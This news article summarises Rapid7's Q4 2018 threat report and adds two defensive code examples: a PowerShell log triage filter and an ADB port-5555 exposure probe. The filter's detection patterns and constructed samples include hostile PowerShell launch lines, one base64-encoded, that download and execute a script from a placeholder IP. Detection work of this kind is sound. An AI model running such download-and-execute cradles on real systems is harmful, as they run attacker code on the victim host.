The accommodation sector saw a rise in attacks in the last quarter of 2018, according to a new report, which also noted the familiar pattern of high volumes of malicious activity targeting the Information, Professional, and Finance industries. The accommodation industry is a particularly attractive target because of the payment card data and personally identifiable information (PII) it handles.
Meanwhile, the most common threat event type in 2018 was remote entry, for both large and small organisations, as attackers transitioned from reconnaissance and independent credential harvesting to using those credentials. According to the quarterly report from Rapid7 (Q4 2018), the takeaway is that enterprises of all sizes are targets, whether for "actual data such as financial or health records, credential stores, or just plain CPU cycles and network bandwidth to be used for crypto mining or launching other attacks."
The report highlighted common attacker behaviours, finding that the most common group of incidents was suspicious authentication (43.8 percent), followed by attacker-based indicators (23.7 percent), PowerShell operations (12 percent) and suspicious processes (10.6 percent) - a mix that indicates lateral movement as attackers move deeper into the network once they hold valid credentials. Interestingly, the next most common incident type was use of a trojan, at only 2.9 percent. "Regardless of the level of 'artificial' intelligence that's baked into any given security event information management (SIEM) system you may use, you will absolutely achieve better outcomes in detecting, deterring, and investigating incidents if you incorporate key learnings by your incredibly smart human responders into your processes", noted the report authors.
Bob Rudis, Rapid7's chief data scientist told SC Media that enterprises should focus on two specific challenges in 2019: "For the next couple of quarters organisations should continue to place an emphasis on detecting and neutralising Emotet as quickly as possible. I don't use this phrase much, but it's pretty scary just how quickly Emotet evolves/incorporates new tech and there are no real signs of it slowing down in 2019. Endpoint monitoring solutions should also be tuned to detecting malicious PowerShell usage as quickly as possible. If organisations have not invested in better endpoint defence solutions it would be wise to dedicate some 2019 budget and project time to doing so."
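The PowerShell-detection point above is easier to act on with a concrete rule set. The following is an added example, not code from the Rapid7 report or from SC Media: a small triage filter for PowerShell script-block text (the kind recorded in Event ID 4104 logs when script block logging is enabled). The pattern list, weights and threshold are assumptions chosen for illustration and should be tuned to the environment; the three log lines are constructed samples, including one whose `-Enc` payload is built inline so the decoder has something realistic to unwrap.

```python
"""Added example: triage filter for PowerShell script-block log text.

Not code from the Rapid7 report or the article. Patterns and weights are
illustrative assumptions; tune them for your own environment.
"""
import base64
import re
from typing import Dict, List, Optional

# Indicators that commonly appear in malicious PowerShell invocations
# (assumed rule set; each has a weight, and 2 or more points is "suspicious").
SUSPICIOUS_PATTERNS: Dict[str, re.Pattern] = {
    "download_cradle": re.compile(r"(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b)"),
    "invoke_expression": re.compile(r"(?i)\b(IEX|Invoke-Expression)\b"),
    "base64_decode": re.compile(r"(?i)FromBase64String"),
    "hidden_window": re.compile(r"(?i)-w(indowstyle)?\s+hidden"),
    "no_profile": re.compile(r"(?i)-nop\b|-noprofile\b"),
    "amsi_tamper": re.compile(r"(?i)amsiInitFailed|AmsiUtils"),
    "reflection_load": re.compile(r"(?i)\[Reflection\.Assembly\]::Load"),
}
WEIGHTS = {"encoded_command": 2, "amsi_tamper": 2}  # everything else scores 1
THRESHOLD = 2

# -e, -ec, -en, -enc and -encodedcommand followed by a base64 blob.
ENCODED_FLAG = re.compile(r"(?i)-e(?:c|n(?:c(?:odedcommand)?)?)?\s+([A-Za-z0-9+/=]{20,})")


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it is not that."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:  # binascii.Error is a subclass of ValueError
        return None
    try:
        return raw.decode("utf-16-le")
    except UnicodeDecodeError:
        return None


def analyse_script_block(text: str) -> dict:
    """Score one script block; matches are run on the decoded payload too."""
    hits = set()
    decoded = None
    match = ENCODED_FLAG.search(text)
    if match:
        hits.add("encoded_command")
        decoded = decode_encoded_command(match.group(1))
    for target in (text, decoded or ""):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(target):
                hits.add(name)
    score = sum(WEIGHTS.get(h, 1) for h in hits)
    return {"hits": sorted(hits), "decoded": decoded, "score": score,
            "suspicious": score >= THRESHOLD}


# Constructed sample script blocks (not real log data). The third one encodes
# a download cradle the way an attacker's -Enc launcher would.
_ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/b.ps1')"
    .encode("utf-16-le")).decode()
SAMPLE_BLOCKS: List[str] = [
    r"Get-ChildItem C:\Windows\Temp | Where-Object { $_.Length -gt 1MB }",
    "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.10/a.ps1')\"",
    "powershell.exe -NoP -NonI -W Hidden -Enc " + _ENCODED_PAYLOAD,
]


def triage(blocks: List[str]) -> List[dict]:
    """Return one verdict per block, preserving input order."""
    return [analyse_script_block(b) for b in blocks]


if __name__ == "__main__":
    for block, verdict in zip(SAMPLE_BLOCKS, triage(SAMPLE_BLOCKS)):
        print(verdict["suspicious"], verdict["score"], verdict["hits"])
        if verdict["decoded"]:
            print("  decoded:", verdict["decoded"])
```

The benign `Get-ChildItem` line scores zero, the plain-text cradle scores on the hidden window, missing profile, `IEX` and the download call, and the encoded launcher is caught both by the `-Enc` flag and by the indicators inside the decoded payload. Decoding the payload is the step that matters in practice: a rule that only looks at the outer command line will miss everything an attacker base64-wraps.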
Overall, 2018 was a year marked by the emergence of organised, deliberate and intelligent attackers who were not only willing but able to invest in research, development, and diversification.
Another observation for 2018 was the rise and subsequent fall of TCP port 5555 - the default listener for the Android Debug Bridge (ADB) - as the vector of choice for aspiring cryptominers looking to turn a profit off of illicit IPTV boxes and other Android devices left with ADB reachable over the network. However, the vector has seen a sharp drop off due to anti-piracy measures designed to combat the use of such devices: "That's right, you can thank intellectual property lawyers for helping to stop cyber-crime…"
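A practitioner reading this will want to know whether any of their own devices answer on that port the way those boxes did. The following is an added example, not code from the report or the article: a minimal ADB handshake probe. It sends the same CNXN message an adb client opens with and classifies the reply - a CNXN back means adbd accepted the connection with no authentication (the condition the cryptominers relied on), AUTH means the device insists on RSA key authentication, and anything else means the listener is not ADB. The message layout (six little-endian 32-bit fields, magic equal to the bitwise complement of the command) is the documented ADB wire format; the sample replies used for the offline check are constructed.

```python
"""Added example: ADB handshake probe for TCP/5555 (not code from the report).

Constructed sample replies are used so the classifier can be exercised
offline; probe() performs the real network exchange.
"""
import socket
import struct

A_CNXN = 0x4E584E43      # b"CNXN" read as little-endian uint32
A_AUTH = 0x48545541      # b"AUTH"
A_VERSION = 0x01000000   # protocol version an old, checksum-using client sends
MAX_PAYLOAD = 4096
HEADER_LEN = 24          # six uint32 fields


def build_message(command: int, arg0: int, arg1: int, payload: bytes = b"") -> bytes:
    """Serialise an ADB message: header (command, arg0, arg1, len, checksum, magic) + payload."""
    checksum = sum(payload) & 0xFFFFFFFF
    header = struct.pack("<6I", command, arg0, arg1, len(payload), checksum,
                         command ^ 0xFFFFFFFF)
    return header + payload


def build_connect() -> bytes:
    """The CNXN an adb client opens with; "host::" is the client banner."""
    return build_message(A_CNXN, A_VERSION, MAX_PAYLOAD, b"host::\x00")


def parse_message(data: bytes):
    """Parse one ADB message; raise ValueError if the bytes are not ADB."""
    if len(data) < HEADER_LEN:
        raise ValueError("too short for an ADB header")
    command, arg0, arg1, length, _checksum, magic = struct.unpack("<6I", data[:HEADER_LEN])
    if magic != command ^ 0xFFFFFFFF:
        raise ValueError("magic is not the complement of command: not ADB")
    return command, arg0, arg1, data[HEADER_LEN:HEADER_LEN + length]


def classify(response: bytes) -> str:
    """Map the device's first reply to open / auth-required / unknown / not-adb."""
    try:
        command, _arg0, _arg1, _payload = parse_message(response)
    except ValueError:
        return "not-adb"
    if command == A_CNXN:
        return "open"           # device connected without asking for a key
    if command == A_AUTH:
        return "auth-required"  # device sent an auth token challenge
    return "unknown"


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            break
        buf += chunk
    return buf


def probe(host: str, port: int = 5555, timeout: float = 3.0) -> str:
    """Live check: send CNXN and classify the first message that comes back."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_connect())
        header = _recv_exact(sock, HEADER_LEN)
        if len(header) < HEADER_LEN:
            return "not-adb"
        length = struct.unpack("<6I", header)[3]
        if length > MAX_PAYLOAD:
            return "not-adb"
        return classify(header + _recv_exact(sock, length))


# Constructed replies (not captured traffic) for an offline check.
SAMPLE_OPEN_REPLY = build_message(A_CNXN, A_VERSION, MAX_PAYLOAD,
                                  b"device::ro.product.name=sample;\x00")
SAMPLE_AUTH_REPLY = build_message(A_AUTH, 1, 0, b"\x00" * 20)   # arg0=1: TOKEN
SAMPLE_HTTP_REPLY = b"HTTP/1.1 400 Bad Request\r\n\r\n"

if __name__ == "__main__":
    for name, reply in (("open", SAMPLE_OPEN_REPLY), ("auth", SAMPLE_AUTH_REPLY),
                        ("http", SAMPLE_HTTP_REPLY)):
        print(name, "->", classify(reply))
```

Run `probe("192.0.2.10")` (address assumed) against your own devices; an "open" result is the state to fix, typically by disabling network ADB (`adb usb`) or the vendor setting that turned it on. The probe only performs the handshake and sends no commands.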
Somewhat depressingly, the use of EternalBlue - the leaked SMBv1 exploit for the flaw Microsoft patched in MS17-010 - remained high throughout 2018, indicating that in spite of enormous publicity via a string of high-profile global attacks, it is still an effective tool for attackers against unpatched hosts. "The code has been repurposed from freshman-level ransomware (WannaCry) to grad-school-level enterprise crippling attack kits (NotPetya), to MBA-level crypto mining (and everything in between). It's truly the gift that keeps on giving", said the report, ruefully.